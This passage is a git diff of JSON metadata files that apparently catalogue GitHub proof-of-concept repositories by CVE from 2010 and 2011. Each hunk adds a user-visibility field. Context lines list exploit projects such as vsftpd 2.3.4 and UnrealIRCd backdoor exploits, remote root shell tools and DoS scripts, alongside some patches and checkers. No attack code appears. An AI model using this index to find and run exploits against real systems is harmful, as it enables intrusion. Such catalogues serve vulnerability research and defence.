"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56311988?v=4", - "html_url": "https:\/\/github.com\/JoseLRC97" + "html_url": "https:\/\/github.com\/JoseLRC97", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JoseLRC97\/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution", "description": "Script that exploits the vulnerability that allows establishing a backdoor in the UnrealIRCd service with CVE-2010-2075", @@ -127,7 +131,8 @@ "login": "nwclasantha", "id": 48653609, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48653609?v=4", - "html_url": "https:\/\/github.com\/nwclasantha" + "html_url": "https:\/\/github.com\/nwclasantha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nwclasantha\/unreal_ircd_3281_backdoor_and_mitigation", "description": "The UnrealIRCd 3.2.8.1 Backdoor is associated with CVE-2010-2075, a well-known vulnerability that was introduced when the source code of the UnrealIRCd software was compromised.", diff --git a/2010/CVE-2010-2387.json b/2010/CVE-2010-2387.json index 9bddaa0813..cd1d8137a4 100644 --- a/2010/CVE-2010-2387.json +++ b/2010/CVE-2010-2387.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2010-2387", "description": null, diff --git a/2010/CVE-2010-2553.json b/2010/CVE-2010-2553.json index f6f41ba284..f74a684313 100644 --- a/2010/CVE-2010-2553.json +++ b/2010/CVE-2010-2553.json @@ -7,7 +7,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/cve-2010-2553-reproduction", "description": "cve-2010-2553复现", diff --git a/2010/CVE-2010-3124.json b/2010/CVE-2010-3124.json index a594b10f06..479e880feb 100644 --- a/2010/CVE-2010-3124.json +++ b/2010/CVE-2010-3124.json @@ -7,7 +7,8 @@ "login": "Nhom6KTLT", "id": 164466034, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164466034?v=4", - "html_url": "https:\/\/github.com\/Nhom6KTLT" + "html_url": "https:\/\/github.com\/Nhom6KTLT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nhom6KTLT\/CVE-2010-3124", "description": null, @@ -37,7 +38,8 @@ "login": "KOBUKOVUI", "id": 149545640, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149545640?v=4", - "html_url": "https:\/\/github.com\/KOBUKOVUI" + "html_url": "https:\/\/github.com\/KOBUKOVUI", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KOBUKOVUI\/DLL_Injection_On_VLC", "description": "DLL Injection and CVE-2010-3124", diff --git a/2010/CVE-2010-3332.json b/2010/CVE-2010-3332.json index 7b4e529c27..4c05a14dae 100644 --- a/2010/CVE-2010-3332.json +++ b/2010/CVE-2010-3332.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/MS10-070", "description": "CVE-2010-3332 Oracle Padding Vulnerability in Microsoft ASP.NET", diff --git a/2010/CVE-2010-3333.json b/2010/CVE-2010-3333.json index 6473e9d555..33524e4bfd 100644 --- a/2010/CVE-2010-3333.json +++ b/2010/CVE-2010-3333.json @@ -7,7 +7,8 @@ "login": "whiteHat001", "id": 18191034, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18191034?v=4", - "html_url": "https:\/\/github.com\/whiteHat001" + "html_url": "https:\/\/github.com\/whiteHat001", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/whiteHat001\/cve-2010-3333", "description": null, @@ -37,7 +38,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2010-3333-reproduction", "description": "CVE-2010-3333复现", diff --git a/2010/CVE-2010-3490.json b/2010/CVE-2010-3490.json index e8eda7ffb6..9296686085 100644 --- a/2010/CVE-2010-3490.json +++ b/2010/CVE-2010-3490.json @@ -7,7 +7,8 @@ "login": "moayadalmalat", "id": 42471675, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42471675?v=4", - "html_url": "https:\/\/github.com\/moayadalmalat" + "html_url": "https:\/\/github.com\/moayadalmalat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/moayadalmalat\/CVE-2010-3490", "description": "FreePBX exploit <= 2.8.0", diff --git a/2010/CVE-2010-3600.json b/2010/CVE-2010-3600.json index c4b79cc9ad..b12c107f68 100644 --- a/2010/CVE-2010-3600.json +++ b/2010/CVE-2010-3600.json @@ -7,7 +7,8 @@ "login": "LAITRUNGMINHDUC", "id": 10572765, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10572765?v=4", - "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC" + "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC\/CVE-2010-3600-PythonHackOracle11gR2", "description": "This Python 3 script is for uploading shell (and other files) to Windows Server \/ Linux via Oracle 11g R2 (CVE-2010-3600).", diff --git a/2010/CVE-2010-3847.json b/2010/CVE-2010-3847.json index 4f4e2e3339..eb1318cdee 100644 --- a/2010/CVE-2010-3847.json +++ b/2010/CVE-2010-3847.json @@ -7,7 +7,8 @@ "login": "magisterquis", "id": 499530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499530?v=4", - "html_url": "https:\/\/github.com\/magisterquis" + "html_url": "https:\/\/github.com\/magisterquis", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/magisterquis\/cve-2010-3847", "description": "Script to take advantage of CVE-2010-3847", diff --git a/2010/CVE-2010-3904.json b/2010/CVE-2010-3904.json index cb5c23404c..21bb7adbd9 100644 --- a/2010/CVE-2010-3904.json +++ b/2010/CVE-2010-3904.json @@ -7,7 +7,8 @@ "login": "redhatkaty", "id": 5626053, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5626053?v=4", - "html_url": "https:\/\/github.com\/redhatkaty" + "html_url": "https:\/\/github.com\/redhatkaty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redhatkaty\/-cve-2010-3904-report", "description": null, diff --git a/2010/CVE-2010-3971.json b/2010/CVE-2010-3971.json index b5adcb57b4..49b80bf522 100644 --- a/2010/CVE-2010-3971.json +++ b/2010/CVE-2010-3971.json @@ -7,7 +7,8 @@ "login": "nektra", "id": 2100960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2100960?v=4", - "html_url": "https:\/\/github.com\/nektra" + "html_url": "https:\/\/github.com\/nektra", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nektra\/CVE-2010-3971-hotpatch", "description": "Do you own security hotfix with Deviare hooking", diff --git a/2010/CVE-2010-4221.json b/2010/CVE-2010-4221.json index bb0a36b1e9..a37c7badf9 100644 --- a/2010/CVE-2010-4221.json +++ b/2010/CVE-2010-4221.json @@ -7,7 +7,8 @@ "login": "M41doror", "id": 10201432, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10201432?v=4", - "html_url": "https:\/\/github.com\/M41doror" + "html_url": "https:\/\/github.com\/M41doror", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/M41doror\/cve-2010-4221", "description": "This exploit was written to study some concepts, enjoy!", diff --git a/2010/CVE-2010-4231.json b/2010/CVE-2010-4231.json index 1d0f65649d..b10ebead8a 100644 --- a/2010/CVE-2010-4231.json +++ b/2010/CVE-2010-4231.json @@ -7,7 +7,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2010-4231-EXPLOIT", "description": "A PoC exploit for CVE-2010-4231 - Directory Traversal Vulnerability in Camtron and TecVoz IP Cameras.", diff --git a/2010/CVE-2010-4476.json b/2010/CVE-2010-4476.json index 6f8b73ae4f..dac7ab01eb 100644 --- a/2010/CVE-2010-4476.json +++ b/2010/CVE-2010-4476.json @@ -7,7 +7,8 @@ "login": "grzegorzblaszczyk", "id": 72544, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72544?v=4", - "html_url": "https:\/\/github.com\/grzegorzblaszczyk" + "html_url": "https:\/\/github.com\/grzegorzblaszczyk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/grzegorzblaszczyk\/CVE-2010-4476-check", "description": "http:\/\/www.oracle.com\/technetwork\/topics\/security\/alert-cve-2010-4476-305811.html", diff --git a/2010/CVE-2010-4669.json b/2010/CVE-2010-4669.json index 2e1692dd19..34706cafc8 100644 --- a/2010/CVE-2010-4669.json +++ b/2010/CVE-2010-4669.json @@ -7,7 +7,8 @@ "login": "wrong-commit", "id": 44012200, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44012200?v=4", - "html_url": "https:\/\/github.com\/wrong-commit" + "html_url": "https:\/\/github.com\/wrong-commit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wrong-commit\/CVE-2010-4669", "description": null, diff --git a/2010/CVE-2010-4804.json b/2010/CVE-2010-4804.json index 5375532677..070e0e2e7f 100644 --- a/2010/CVE-2010-4804.json +++ b/2010/CVE-2010-4804.json @@ -7,7 +7,8 @@ "login": "thomascannon", "id": 1297160, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1297160?v=4", - "html_url": "https:\/\/github.com\/thomascannon" + "html_url": "https:\/\/github.com\/thomascannon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thomascannon\/android-cve-2010-4804", "description": "Android Data Stealing Vulnerability", diff --git a/2010/CVE-2010-5230.json b/2010/CVE-2010-5230.json index 93855c0c3a..38ac8edcc2 100644 --- a/2010/CVE-2010-5230.json +++ b/2010/CVE-2010-5230.json @@ -7,7 +7,8 @@ "login": "otofoto", "id": 26463333, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26463333?v=4", - "html_url": "https:\/\/github.com\/otofoto" + "html_url": "https:\/\/github.com\/otofoto", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/otofoto\/CVE-2010-5230", "description": "Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.", diff --git a/2010/CVE-2010-5301.json b/2010/CVE-2010-5301.json index f870aa9bac..9db2f1e9ef 100644 --- a/2010/CVE-2010-5301.json +++ b/2010/CVE-2010-5301.json @@ -7,7 +7,8 @@ "login": "lem0nSec", "id": 98479572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98479572?v=4", - "html_url": "https:\/\/github.com\/lem0nSec" + "html_url": "https:\/\/github.com\/lem0nSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lem0nSec\/CVE-2010-5301", "description": "A proof of concept of an SEH overflow with arbitrary dll injection", diff --git a/2011/CVE-2011-0104.json b/2011/CVE-2011-0104.json index 2fc41eb390..b2401e403e 100644 --- a/2011/CVE-2011-0104.json +++ b/2011/CVE-2011-0104.json @@ -7,7 +7,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2011-0104-reproduction", "description": "CVE-2011-0104复现", diff --git a/2011/CVE-2011-0228.json b/2011/CVE-2011-0228.json index ce45495816..3b0c0843c5 100644 --- a/2011/CVE-2011-0228.json +++ b/2011/CVE-2011-0228.json @@ -7,7 +7,8 @@ "login": "jan0", "id": 101830, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101830?v=4", - "html_url": "https:\/\/github.com\/jan0" + "html_url": "https:\/\/github.com\/jan0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jan0\/isslfix", "description": "CVE-2011-0228 fix for older idevices\/firmwares", diff --git a/2011/CVE-2011-1237.json b/2011/CVE-2011-1237.json index 3786e9331b..4956c27a2e 100644 --- a/2011/CVE-2011-1237.json +++ b/2011/CVE-2011-1237.json @@ -7,7 +7,8 @@ "login": "BrunoPujos", "id": 28804193, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28804193?v=4", - "html_url": "https:\/\/github.com\/BrunoPujos" + "html_url": "https:\/\/github.com\/BrunoPujos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/BrunoPujos\/CVE-2011-1237", "description": "POC for exploit of CVE-2011-1237", diff --git a/2011/CVE-2011-1249.json b/2011/CVE-2011-1249.json index 70af832d44..04fd7eb292 100644 --- a/2011/CVE-2011-1249.json +++ b/2011/CVE-2011-1249.json @@ -7,7 +7,8 @@ "login": "Madusanka99", "id": 50735991, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50735991?v=4", - "html_url": "https:\/\/github.com\/Madusanka99" + "html_url": "https:\/\/github.com\/Madusanka99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Madusanka99\/OHTS", "description": "Microsoft Windows - 'afd.sys' Local Kernel Privilege Escalation Exploit Report (CVE-2011-1249)", @@ -37,7 +38,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2011-1249", "description": null, diff --git a/2011/CVE-2011-1473.json b/2011/CVE-2011-1473.json index 25cf2f4323..54f9035fdd 100644 --- a/2011/CVE-2011-1473.json +++ b/2011/CVE-2011-1473.json @@ -7,7 +7,8 @@ "login": "zjt674449039", "id": 47102219, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47102219?v=4", - "html_url": "https:\/\/github.com\/zjt674449039" + "html_url": "https:\/\/github.com\/zjt674449039", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zjt674449039\/cve-2011-1473", "description": null, @@ -37,7 +38,8 @@ "login": "XDLDCG", "id": 54423687, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54423687?v=4", - "html_url": "https:\/\/github.com\/XDLDCG" + "html_url": "https:\/\/github.com\/XDLDCG", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/XDLDCG\/bash-tls-reneg-attack", "description": "A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details.", diff --git a/2011/CVE-2011-1475.json b/2011/CVE-2011-1475.json index 86513b53ef..2abbcf3546 100644 --- a/2011/CVE-2011-1475.json +++ b/2011/CVE-2011-1475.json @@ -7,7 +7,8 @@ "login": "samaujs", "id": 13311002, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13311002?v=4", - "html_url": "https:\/\/github.com\/samaujs" + "html_url": "https:\/\/github.com\/samaujs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/samaujs\/CVE-2011-1475", "description": "Check with Maven on CVE-2011-1475", diff --git a/2011/CVE-2011-1485.json b/2011/CVE-2011-1485.json index 3c7c7d14c3..1bd60ecb73 100644 --- a/2011/CVE-2011-1485.json +++ b/2011/CVE-2011-1485.json @@ -7,7 +7,8 @@ "login": "Pashkela", "id": 4710642, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4710642?v=4", - "html_url": "https:\/\/github.com\/Pashkela" + "html_url": "https:\/\/github.com\/Pashkela", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pashkela\/CVE-2011-1485", "description": "CVE-2011-1485 - Published: 2011-04-01 - PolicyKit:", diff --git a/2011/CVE-2011-1571.json b/2011/CVE-2011-1571.json index 6e4c433531..0fbed014d8 100644 --- a/2011/CVE-2011-1571.json +++ b/2011/CVE-2011-1571.json @@ -7,7 +7,8 @@ "login": "noobpk", "id": 31820707, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31820707?v=4", - "html_url": "https:\/\/github.com\/noobpk" + "html_url": "https:\/\/github.com\/noobpk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/noobpk\/CVE-2011-1571", "description": "Liferay XSL - Command Execution (Metasploit)", diff --git a/2011/CVE-2011-1575.json b/2011/CVE-2011-1575.json index 8f49ab1be1..be1454e21d 100644 --- a/2011/CVE-2011-1575.json +++ b/2011/CVE-2011-1575.json @@ -7,7 +7,8 @@ "login": "masamoon", "id": 3777988, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3777988?v=4", - "html_url": "https:\/\/github.com\/masamoon" + "html_url": "https:\/\/github.com\/masamoon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/masamoon\/cve-2011-1575-poc", "description": "Very simple script to test for cve 2011-1575", diff --git a/2011/CVE-2011-1720.json b/2011/CVE-2011-1720.json index 9b7c0a9937..40b02836d2 100644 --- a/2011/CVE-2011-1720.json +++ b/2011/CVE-2011-1720.json @@ -7,7 +7,8 @@ "login": "nbeguier", "id": 7660866, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7660866?v=4", - "html_url": "https:\/\/github.com\/nbeguier" + "html_url": "https:\/\/github.com\/nbeguier", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nbeguier\/postfix_exploit", "description": "Exploit of CVE-2011-1720.", diff --git a/2011/CVE-2011-1974.json b/2011/CVE-2011-1974.json index 65e263940e..61201bb385 100644 --- a/2011/CVE-2011-1974.json +++ b/2011/CVE-2011-1974.json @@ -7,7 +7,8 @@ "login": "hittlle", "id": 4122514, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4122514?v=4", - "html_url": "https:\/\/github.com\/hittlle" + "html_url": "https:\/\/github.com\/hittlle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hittlle\/CVE-2011-1974-PoC", "description": null, diff --git a/2011/CVE-2011-2461.json b/2011/CVE-2011-2461.json index 0610aa292c..5a03b64294 100644 --- a/2011/CVE-2011-2461.json +++ b/2011/CVE-2011-2461.json @@ -7,7 +7,8 @@ "login": "ikkisoft", "id": 6027823, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6027823?v=4", - "html_url": "https:\/\/github.com\/ikkisoft" + "html_url": "https:\/\/github.com\/ikkisoft", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ikkisoft\/ParrotNG", "description": "ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461", @@ -37,7 +38,8 @@ "login": "u-maxx", "id": 2717220, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2717220?v=4", - "html_url": "https:\/\/github.com\/u-maxx" + "html_url": "https:\/\/github.com\/u-maxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u-maxx\/magento-swf-patched-CVE-2011-2461", "description": "Patched version of the uploader.swf and uploaderSingle.swf to fix CVE-2011-2461", @@ -67,7 +69,8 @@ "login": "edmondscommerce", "id": 62842, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62842?v=4", - "html_url": "https:\/\/github.com\/edmondscommerce" + "html_url": "https:\/\/github.com\/edmondscommerce", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/edmondscommerce\/CVE-2011-2461_Magento_Patch", "description": null, diff --git a/2011/CVE-2011-2523.json b/2011/CVE-2011-2523.json index a85dfabd0f..33f3521284 100644 --- a/2011/CVE-2011-2523.json +++ b/2011/CVE-2011-2523.json @@ -7,7 +7,8 @@ "login": "HerculesRD", "id": 73125772, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73125772?v=4", - "html_url": "https:\/\/github.com\/HerculesRD" + "html_url": "https:\/\/github.com\/HerculesRD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HerculesRD\/vsftpd2.3.4PyExploit", "description": "An exploit to get root in vsftpd 2.3.4 (CVE-2011-2523) written in python", @@ -37,7 +38,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2011-2523", "description": "vsftpd 2.3.4 Backdoor Exploit", @@ -67,7 +69,8 @@ "login": "Gr4ykt", "id": 78503985, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78503985?v=4", - "html_url": "https:\/\/github.com\/Gr4ykt" + "html_url": "https:\/\/github.com\/Gr4ykt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gr4ykt\/CVE-2011-2523", "description": "https:\/\/www.exploit-db.com\/exploits\/49757", @@ -97,7 +100,8 @@ "login": "padsalatushal", "id": 57517785, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57517785?v=4", - "html_url": "https:\/\/github.com\/padsalatushal" + "html_url": "https:\/\/github.com\/padsalatushal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/padsalatushal\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution", @@ -134,7 +138,8 @@ "login": "MFernstrom", "id": 9220603, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9220603?v=4", - "html_url": "https:\/\/github.com\/MFernstrom" + "html_url": "https:\/\/github.com\/MFernstrom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MFernstrom\/OffensivePascal-CVE-2011-2523", "description": "FreePascal implementation of the vsFTPD 2.3.4 CVE-2011-2523", @@ -164,7 +169,8 @@ "login": "0xSojalSec", "id": 92203029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", - "html_url": "https:\/\/github.com\/0xSojalSec" + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xSojalSec\/-CVE-2011-2523", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -194,7 +200,8 @@ "login": "0xSojalSec", "id": 92203029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", - "html_url": "https:\/\/github.com\/0xSojalSec" + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xSojalSec\/CVE-2011-2523", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -224,7 +231,8 @@ "login": "XiangSi-Howard", "id": 54540850, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54540850?v=4", - "html_url": "https:\/\/github.com\/XiangSi-Howard" + "html_url": "https:\/\/github.com\/XiangSi-Howard", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/XiangSi-Howard\/CTF---CVE-2011-2523", "description": null, @@ -254,7 +262,8 @@ "login": "cowsecurity", "id": 74612612, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", - "html_url": "https:\/\/github.com\/cowsecurity" + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2011-2523", "description": "CVE-2011-2523 exploit", @@ -284,7 +293,8 @@ "login": "Lynk4", "id": 44930131, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44930131?v=4", - "html_url": "https:\/\/github.com\/Lynk4" + "html_url": "https:\/\/github.com\/Lynk4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Lynk4\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution", @@ -323,7 +333,8 @@ "login": "vaishnavucv", "id": 76824366, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76824366?v=4", - "html_url": "https:\/\/github.com\/vaishnavucv" + "html_url": "https:\/\/github.com\/vaishnavucv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vaishnavucv\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution ", @@ -353,7 +364,8 @@ "login": "chleba124", "id": 121700816, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121700816?v=4", - "html_url": "https:\/\/github.com\/chleba124" + "html_url": "https:\/\/github.com\/chleba124", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chleba124\/vsftpd-exploit", "description": "A tool that exploits the CVE-2011-2523 vulnerability.", @@ -383,7 +395,8 @@ "login": "4m3rr0r", "id": 90191914, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90191914?v=4", - "html_url": "https:\/\/github.com\/4m3rr0r" + "html_url": "https:\/\/github.com\/4m3rr0r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/4m3rr0r\/CVE-2011-2523-poc", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -420,7 +433,8 @@ "login": "Shubham-2k1", "id": 71768868, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71768868?v=4", - "html_url": "https:\/\/github.com\/Shubham-2k1" + "html_url": "https:\/\/github.com\/Shubham-2k1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Shubham-2k1\/Exploit-CVE-2011-2523", "description": null, @@ -450,7 +464,8 @@ "login": "Tenor-Z", "id": 55516164, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55516164?v=4", - "html_url": "https:\/\/github.com\/Tenor-Z" + "html_url": "https:\/\/github.com\/Tenor-Z", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Tenor-Z\/SmileySploit", "description": "A basic script that exploits CVE-2011-2523", @@ -480,7 +495,8 @@ "login": "R4idB0Y", "id": 132174647, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132174647?v=4", - "html_url": "https:\/\/github.com\/R4idB0Y" + "html_url": "https:\/\/github.com\/R4idB0Y", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R4idB0Y\/CVE-2011-2523-PoC", "description": "PoC CVE-2011-2523 ", @@ -510,7 +526,8 @@ "login": "AnugiArrawwala", "id": 141626082, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141626082?v=4", - "html_url": "https:\/\/github.com\/AnugiArrawwala" + "html_url": "https:\/\/github.com\/AnugiArrawwala", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AnugiArrawwala\/CVE-Research", "description": "CVE-2017-0144 (Eternal Blue) | CVE-2023-3881 | CVE-2011-2523", @@ -540,7 +557,8 @@ "login": "Gill-Singh-A", "id": 123238182, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123238182?v=4", - "html_url": "https:\/\/github.com\/Gill-Singh-A" + "html_url": "https:\/\/github.com\/Gill-Singh-A", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gill-Singh-A\/vsFTP-2.3.4-Remote-Root-Shell-Exploit", "description": "A Simple Python Program that uses gets a Remote Root Shell on the Target Device by exploiting a Vulnerability (CVE-2011-2523) present in vsFTP 2.3.4", @@ -577,7 +595,8 @@ "login": "everythingBlackkk", "id": 142638957, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142638957?v=4", - "html_url": "https:\/\/github.com\/everythingBlackkk" + "html_url": "https:\/\/github.com\/everythingBlackkk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/everythingBlackkk\/vsFTPd-Backdoor-Exploit-CVE-2011-2523-", "description": "This tool exploits a well-known backdoor vulnerability found in vsFTPd version 2.3.4 (CVE-2011-2523)", diff --git a/2011/CVE-2011-2894.json b/2011/CVE-2011-2894.json index c1fd8afac0..f53331cad5 100644 --- a/2011/CVE-2011-2894.json +++ b/2011/CVE-2011-2894.json @@ -7,7 +7,8 @@ "login": "pwntester", "id": 125701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125701?v=4", - "html_url": "https:\/\/github.com\/pwntester" + "html_url": "https:\/\/github.com\/pwntester", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwntester\/SpringBreaker", "description": "Exploit PoC for Spring RCE issue (CVE-2011-2894)", diff --git a/2011/CVE-2011-3026.json b/2011/CVE-2011-3026.json index 210c6e8f43..d4a9d0d305 100644 --- a/2011/CVE-2011-3026.json +++ b/2011/CVE-2011-3026.json @@ -7,7 +7,8 @@ "login": "argp", "id": 145419, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145419?v=4", - "html_url": "https:\/\/github.com\/argp" + "html_url": "https:\/\/github.com\/argp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/argp\/cve-2011-3026-firefox", "description": "Example of exploiting CVE-2011-3026 on Firefox (Linux\/x86)", diff --git a/2011/CVE-2011-3192.json b/2011/CVE-2011-3192.json index 880237c34e..34ff130d70 100644 --- a/2011/CVE-2011-3192.json +++ 